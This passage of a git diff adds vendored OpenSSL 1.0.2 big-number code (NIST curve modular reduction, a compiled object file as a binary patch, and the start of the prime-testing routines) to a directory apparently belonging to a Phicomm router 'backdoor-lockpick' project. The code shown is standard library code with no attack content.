+        acc -= bp[22 - 12];
+        acc -= bp[23 - 12];
+        rp[3] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[4];
+        acc += bp[21 - 12];
+        acc += bp[21 - 12];
+        acc += bp[16 - 12];
+        acc += bp[13 - 12];
+        acc += bp[12 - 12];
+        acc += bp[20 - 12];
+        acc += bp[22 - 12];
+        acc -= bp[15 - 12];
+        acc -= bp[23 - 12];
+        acc -= bp[23 - 12];
+        rp[4] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[5];
+        acc += bp[22 - 12];
+        acc += bp[22 - 12];
+        acc += bp[17 - 12];
+        acc += bp[14 - 12];
+        acc += bp[13 - 12];
+        acc += bp[21 - 12];
+        acc += bp[23 - 12];
+        acc -= bp[16 - 12];
+        rp[5] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[6];
+        acc += bp[23 - 12];
+        acc += bp[23 - 12];
+        acc += bp[18 - 12];
+        acc += bp[15 - 12];
+        acc += bp[14 - 12];
+        acc += bp[22 - 12];
+        acc -= bp[17 - 12];
+        rp[6] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[7];
+        acc += bp[19 - 12];
+        acc += bp[16 - 12];
+        acc += bp[15 - 12];
+        acc += bp[23 - 12];
+        acc -= bp[18 - 12];
+        rp[7] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[8];
+        acc += bp[20 - 12];
+        acc += bp[17 - 12];
+        acc += bp[16 - 12];
+        acc -= bp[19 - 12];
+        rp[8] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[9];
+        acc += bp[21 - 12];
+        acc += bp[18 - 12];
+        acc += bp[17 - 12];
+        acc -= bp[20 - 12];
+        rp[9] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[10];
+        acc += bp[22 - 12];
+        acc += bp[19 - 12];
+        acc += bp[18 - 12];
+        acc -= bp[21 - 12];
+        rp[10] = (unsigned int)acc;
+        acc >>= 32;
+
+        acc += rp[11];
+        acc += bp[23 - 12];
+        acc += bp[20 - 12];
+        acc += bp[19 - 12];
+        acc -= bp[22 - 12];
+        rp[11] = (unsigned int)acc;
+
+        carry = (int)(acc >> 32);
+    }
+#else
+    {
+        BN_ULONG t_d[BN_NIST_384_TOP];
+
+        /*
+         * S1
+         */
+        nist_set_256(t_d, buf.bn, 0, 0, 0, 0, 0, 23 - 4, 22 - 4, 21 - 4);
+        /* left shift */
+        {
+            register BN_ULONG *ap, t, c;
+            ap = t_d;
+            c = 0;
+            for (i = 3; i != 0; --i) {
+                t = *ap;
+                *(ap++) = ((t << 1) | c) & BN_MASK2;
+                c = (t & BN_TBIT) ? 1 : 0;
+            }
+            *ap = c;
+        }
+        carry =
+            (int)bn_add_words(r_d + (128 / BN_BITS2), r_d + (128 / BN_BITS2),
+                              t_d, BN_NIST_256_TOP);
+        /*
+         * S2
+         */
+        carry += (int)bn_add_words(r_d, r_d, buf.bn, BN_NIST_384_TOP);
+        /*
+         * S3
+         */
+        nist_set_384(t_d, buf.bn, 20, 19, 18, 17, 16, 15, 14, 13, 12, 23, 22,
+                     21);
+        carry += (int)bn_add_words(r_d, r_d, t_d, BN_NIST_384_TOP);
+        /*
+         * S4
+         */
+        nist_set_384(t_d, buf.bn, 19, 18, 17, 16, 15, 14, 13, 12, 20, 0, 23,
+                     0);
+        carry += (int)bn_add_words(r_d, r_d, t_d, BN_NIST_384_TOP);
+        /*
+         * S5
+         */
+        nist_set_384(t_d, buf.bn, 0, 0, 0, 0, 23, 22, 21, 20, 0, 0, 0, 0);
+        carry += (int)bn_add_words(r_d, r_d, t_d, BN_NIST_384_TOP);
+        /*
+         * S6
+         */
+        nist_set_384(t_d, buf.bn, 0, 0, 0, 0, 0, 0, 23, 22, 21, 0, 0, 20);
+        carry += (int)bn_add_words(r_d, r_d, t_d, BN_NIST_384_TOP);
+        /*
+         * D1
+         */
+        nist_set_384(t_d, buf.bn, 22, 21, 20, 19, 18, 17, 16, 15, 14, 13, 12,
+                     23);
+        carry -= (int)bn_sub_words(r_d, r_d, t_d, BN_NIST_384_TOP);
+        /*
+         * D2
+         */
+        nist_set_384(t_d, buf.bn, 0, 0, 0, 0, 0, 0, 0, 23, 22, 21, 20, 0);
+        carry -= (int)bn_sub_words(r_d, r_d, t_d, BN_NIST_384_TOP);
+        /*
+         * D3
+         */
+        nist_set_384(t_d, buf.bn, 0, 0, 0, 0, 0, 0, 0, 23, 23, 0, 0, 0);
+        carry -= (int)bn_sub_words(r_d, r_d, t_d, BN_NIST_384_TOP);
+
+    }
+#endif
+    /* see BN_nist_mod_224 for explanation */
+    u.f = bn_sub_words;
+    if (carry > 0)
+        carry =
+            (int)bn_sub_words(r_d, r_d, _nist_p_384[carry - 1],
+                              BN_NIST_384_TOP);
+    else if (carry < 0) {
+        carry =
+            (int)bn_add_words(r_d, r_d, _nist_p_384[-carry - 1],
+                              BN_NIST_384_TOP);
+        mask = 0 - (PTR_SIZE_INT) carry;
+        u.p = ((PTR_SIZE_INT) bn_sub_words & mask) |
+            ((PTR_SIZE_INT) bn_add_words & ~mask);
+    } else
+        carry = 1;
+
+    mask =
+        0 - (PTR_SIZE_INT) (*u.f) (c_d, r_d, _nist_p_384[0], BN_NIST_384_TOP);
+    mask &= 0 - (PTR_SIZE_INT) carry;
+    res = c_d;
+    res = (BN_ULONG *)(((PTR_SIZE_INT) res & ~mask) |
+                       ((PTR_SIZE_INT) r_d & mask));
+    nist_cp_bn(r_d, res, BN_NIST_384_TOP);
+    r->top = BN_NIST_384_TOP;
+    bn_correct_top(r);
+
+    return 1;
+}
+
+#define BN_NIST_521_RSHIFT      (521%BN_BITS2)
+#define BN_NIST_521_LSHIFT      (BN_BITS2-BN_NIST_521_RSHIFT)
+#define BN_NIST_521_TOP_MASK    ((BN_ULONG)BN_MASK2>>BN_NIST_521_LSHIFT)
+
+int BN_nist_mod_521(BIGNUM *r, const BIGNUM *a, const BIGNUM *field,
+                    BN_CTX *ctx)
+{
+    int top = a->top, i;
+    BN_ULONG *r_d, *a_d = a->d, t_d[BN_NIST_521_TOP], val, tmp, *res;
+    PTR_SIZE_INT mask;
+    static const BIGNUM _bignum_nist_p_521_sqr = {
+        (BN_ULONG *)_nist_p_521_sqr,
+        sizeof(_nist_p_521_sqr) / sizeof(_nist_p_521_sqr[0]),
+        sizeof(_nist_p_521_sqr) / sizeof(_nist_p_521_sqr[0]),
+        0, BN_FLG_STATIC_DATA
+    };
+
+    field = &_bignum_nist_p_521; /* just to make sure */
+
+    if (BN_is_negative(a) || BN_ucmp(a, &_bignum_nist_p_521_sqr) >= 0)
+        return BN_nnmod(r, a, field, ctx);
+
+    i = BN_ucmp(field, a);
+    if (i == 0) {
+        BN_zero(r);
+        return 1;
+    } else if (i > 0)
+        return (r == a) ? 1 : (BN_copy(r, a) != NULL);
+
+    if (r != a) {
+        if (!bn_wexpand(r, BN_NIST_521_TOP))
+            return 0;
+        r_d = r->d;
+        nist_cp_bn(r_d, a_d, BN_NIST_521_TOP);
+    } else
+        r_d = a_d;
+
+    /* upper 521 bits, copy ... */
+    nist_cp_bn_0(t_d, a_d + (BN_NIST_521_TOP - 1),
+                 top - (BN_NIST_521_TOP - 1), BN_NIST_521_TOP);
+    /* ... and right shift */
+    for (val = t_d[0], i = 0; i < BN_NIST_521_TOP - 1; i++) {
+        t_d[i] = (val >> BN_NIST_521_RSHIFT |
+                  (tmp = t_d[i + 1]) << BN_NIST_521_LSHIFT) & BN_MASK2;
+        val = tmp;
+    }
+    t_d[i] = val >> BN_NIST_521_RSHIFT;
+    /* lower 521 bits */
+    r_d[i] &= BN_NIST_521_TOP_MASK;
+
+    bn_add_words(r_d, r_d, t_d, BN_NIST_521_TOP);
+    mask =
+        0 - (PTR_SIZE_INT) bn_sub_words(t_d, r_d, _nist_p_521,
+                                        BN_NIST_521_TOP);
+    res = t_d;
+    res = (BN_ULONG *)(((PTR_SIZE_INT) res & ~mask) |
+                       ((PTR_SIZE_INT) r_d & mask));
+    nist_cp_bn(r_d, res, BN_NIST_521_TOP);
+    r->top = BN_NIST_521_TOP;
+    bn_correct_top(r);
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_nist.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_nist.o
new file mode 100644
index 0000000000000000000000000000000000000000..cb0fc6f9ce988307a65b452aebfdeaf6d9c78a03
GIT binary patch
literal 11928
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
RpMIDxMaZM3$o>uL|3AK18%O{E

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.c
new file mode 100644
index 0000000..1d25687
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.c
@@ -0,0 +1,515 @@
+/* crypto/bn/bn_prime.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+#include <openssl/rand.h>
+
+/*
+ * NB: these functions have been "upgraded", the deprecated versions (which
+ * are compatibility wrappers using these functions) are in bn_depr.c. -
+ * Geoff
+ */
+
+/*
+ * The quick sieve algorithm approach to weeding out primes is Philip
+ * Zimmermann's, as implemented in PGP.  I have had a read of his comments
+ * and implemented my own version.
+ */
+#include "bn_prime.h"
+
+static int witness(BIGNUM *w, const BIGNUM *a, const BIGNUM *a1,
+                   const BIGNUM *a1_odd, int k, BN_CTX *ctx,
+                   BN_MONT_CTX *mont);
+static int probable_prime(BIGNUM *rnd, int bits);
+static int probable_prime_dh(BIGNUM *rnd, int bits,
+                             const BIGNUM *add, const BIGNUM *rem,
+                             BN_CTX *ctx);
+static int probable_prime_dh_safe(BIGNUM *rnd, int bits, const BIGNUM *add,
+                                  const BIGNUM *rem, BN_CTX *ctx);
+
+int BN_GENCB_call(BN_GENCB *cb, int a, int b)
+{
+    /* No callback means continue */
+    if (!cb)
+        return 1;
+    switch (cb->ver) {
+    case 1:
+        /* Deprecated-style callbacks */
+        if (!cb->cb.cb_1)
+            return 1;
+        cb->cb.cb_1(a, b, cb->arg);
+        return 1;
+    case 2:
+        /* New-style callbacks */
+        return cb->cb.cb_2(a, b, cb);
+    default:
+        break;
+    }
+    /* Unrecognised callback type */
+    return 0;
+}
+
+int BN_generate_prime_ex(BIGNUM *ret, int bits, int safe,
+                         const BIGNUM *add, const BIGNUM *rem, BN_GENCB *cb)
+{
+    BIGNUM *t;
+    int found = 0;
+    int i, j, c1 = 0;
+    BN_CTX *ctx;
+    int checks = BN_prime_checks_for_size(bits);
+
+    ctx = BN_CTX_new();
+    if (ctx == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+    t = BN_CTX_get(ctx);
+    if (!t)
+        goto err;
+ loop:
+    /* make a random number and set the top and bottom bits */
+    if (add == NULL) {
+        if (!probable_prime(ret, bits))
+            goto err;
+    } else {
+        if (safe) {
+            if (!probable_prime_dh_safe(ret, bits, add, rem, ctx))
+                goto err;
+        } else {
+            if (!probable_prime_dh(ret, bits, add, rem, ctx))
+                goto err;
+        }
+    }
+    /* if (BN_mod_word(ret,(BN_ULONG)3) == 1) goto loop; */
+    if (!BN_GENCB_call(cb, 0, c1++))
+        /* aborted */
+        goto err;
+
+    if (!safe) {
+        i = BN_is_prime_fasttest_ex(ret, checks, ctx, 0, cb);
+        if (i == -1)
+            goto err;
+        if (i == 0)
+            goto loop;
+    } else {
+        /*
+         * for "safe prime" generation, check that (p-1)/2 is prime. Since a
+         * prime is odd, We just need to divide by 2
+         */
+        if (!BN_rshift1(t, ret))
+            goto err;
+
+        for (i = 0; i < checks; i++) {
+            j = BN_is_prime_fasttest_ex(ret, 1, ctx, 0, cb);
+            if (j == -1)
+                goto err;
+            if (j == 0)
+                goto loop;
+
+            j = BN_is_prime_fasttest_ex(t, 1, ctx, 0, cb);
+            if (j == -1)
+                goto err;
+            if (j == 0)
+                goto loop;
+
+            if (!BN_GENCB_call(cb, 2, c1 - 1))
+                goto err;
+            /* We have a safe prime test pass */
+        }
+    }
+    /* we have a prime :-) */
+    found = 1;
+ err:
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    bn_check_top(ret);
+    return found;
+}
+
+int BN_is_prime_ex(const BIGNUM *a, int checks, BN_CTX *ctx_passed,
+                   BN_GENCB *cb)
+{
+    return BN_is_prime_fasttest_ex(a, checks, ctx_passed, 0, cb);
+}
+
+int BN_is_prime_fasttest_ex(const BIGNUM *a, int checks, BN_CTX *ctx_passed,
+                            int do_trial_division, BN_GENCB *cb)
+{
+    int i, j, ret = -1;
+    int k;
+    BN_CTX *ctx = NULL;
+    BIGNUM *A1, *A1_odd, *check; /* taken from ctx */
+    BN_MONT_CTX *mont = NULL;
+    const BIGNUM *A = NULL;
+
+    if (BN_cmp(a, BN_value_one()) <= 0)
+        return 0;
+
+    if (checks == BN_prime_checks)
+        checks = BN_prime_checks_for_size(BN_num_bits(a));
+
+    /* first look for small factors */
+    if (!BN_is_odd(a))
+        /* a is even => a is prime if and only if a == 2 */
+        return BN_is_word(a, 2);
+    if (do_trial_division) {
+        for (i = 1; i < NUMPRIMES; i++)
+            if (BN_mod_word(a, primes[i]) == 0)
+                return 0;
+        if (!BN_GENCB_call(cb, 1, -1))
+            goto err;
+    }
+
+    if (ctx_passed != NULL)
+        ctx = ctx_passed;
+    else if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+
+    /* A := abs(a) */
+    if (a->neg) {
+        BIGNUM *t;
+        if ((t = BN_CTX_get(ctx)) == NULL)
+            goto err;
+        BN_copy(t, a);
+        t->neg = 0;
+        A = t;
+    } else
+        A = a;
+    A1 = BN_CTX_get(ctx);
+    A1_odd = BN_CTX_get(ctx);
+    check = BN_CTX_get(ctx);
